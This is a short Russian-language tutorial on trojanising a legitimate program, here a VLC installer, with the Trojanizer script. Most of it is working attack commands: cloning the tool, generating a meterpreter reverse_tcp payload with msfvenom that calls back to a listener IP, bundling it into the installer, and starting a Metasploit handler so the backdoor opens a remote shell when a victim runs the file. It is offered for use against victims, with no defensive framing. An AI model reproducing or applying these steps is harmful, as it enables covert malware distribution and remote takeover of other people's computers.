Внедрение троянца в легитимную программу через Trojanizer
Sam SepiolСкрипт: trojanizer
Программа которая сохраняет файл и вставляет в него бекдор, даже в установочный файл.
Установим программу:
git clone https://github.com/r00t-3xp10it/trojanizer
программа работает в двух режимах.
1й - объединить два файла в sfx архив. И запустит их при распаковке.
2й - к легитимному файлу добавит специальную команду, которая будет выполнена после запуска архива.
Рассмотрим 1й способ:
Устанавливаем скрипт:
git clone https://github.com/r00t-3xp10it/trojanizer
Создадим сам файл с вредоносным кодом:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.16 -f exe -o /root/Desktop/trojan.exe
Скачиваем например установочный файл медиаплеера VLC
Запускаем trojanizer:
- просит указать файл с вредоносным кодом
- далее выбираем легитимную программу
- вводим название результирующего файла
- далее он предлагает выбрать иконку, но не всегда срабатывает
запускаем слушатель:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.16
run
При запуске этого файла на компьютере жертвы, будет одновременно запущен и бекдор